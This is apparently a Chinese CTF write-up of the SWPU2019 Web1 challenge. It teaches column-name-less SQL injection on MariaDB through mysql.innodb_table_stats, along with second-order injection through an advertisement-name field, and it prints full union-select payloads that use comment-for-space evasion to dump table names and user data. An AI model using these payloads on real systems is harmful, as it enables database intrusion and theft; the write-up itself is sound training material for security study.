无列名注入

[SWPU2019]Web1

2021.1.16

这题确实不会,查看大佬的wp

需要利用MariaDB的一些特性

知识点学习

MariaDB数据库可以利用 mysql.innodb_table_stats 查表名
select group_concat(table_name) from mysql.innodb_table_stats

无列名注入

image-20210116224446299image-20210116224446299

正常查询时列名正常显示

image-20210116224526741image-20210116224526741

使用联合查询,这时列名发生了变化

这里可以利用这个方式在不知道列名的情况下查询内容

image-20210116224644826image-20210116224644826

使用反引号和别名,直接获取到了单列的值

反引号禁用时

image-20210116224745966image-20210116224745966

这里直接利用了取别名的方式,没有使用反引号

相关学习文章

WP

二次注入

直接将广告名写为1’,保存后查看

image-20210116231225422image-20210116231225422

这题需要在申请广告的广告名处注入,之前搞错了…… 拿着id怼了半天……

image-20210116233000715image-20210116233000715

image-20210116232950459image-20210116232950459

这里报错字段长度不对劲

image-20210116233057745image-20210116233057745

image-20210116233047870image-20210116233047870

多次尝试发现字段长度为22并且回显的地方为2,3两处

查库:-1'/**/union/**/select/**/1,user(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/'

image-20210116233316001image-20210116233316001

payload:
-1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from/**/(select/**/1,2,3/**/as/**/a/**/union/**/select/**/*/**/from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

image-20210117000629293image-20210117000629293

此题主要掌握无列名查询与查询表名的新方法

最后修改于:2021年03月31日 21:46

添加新评论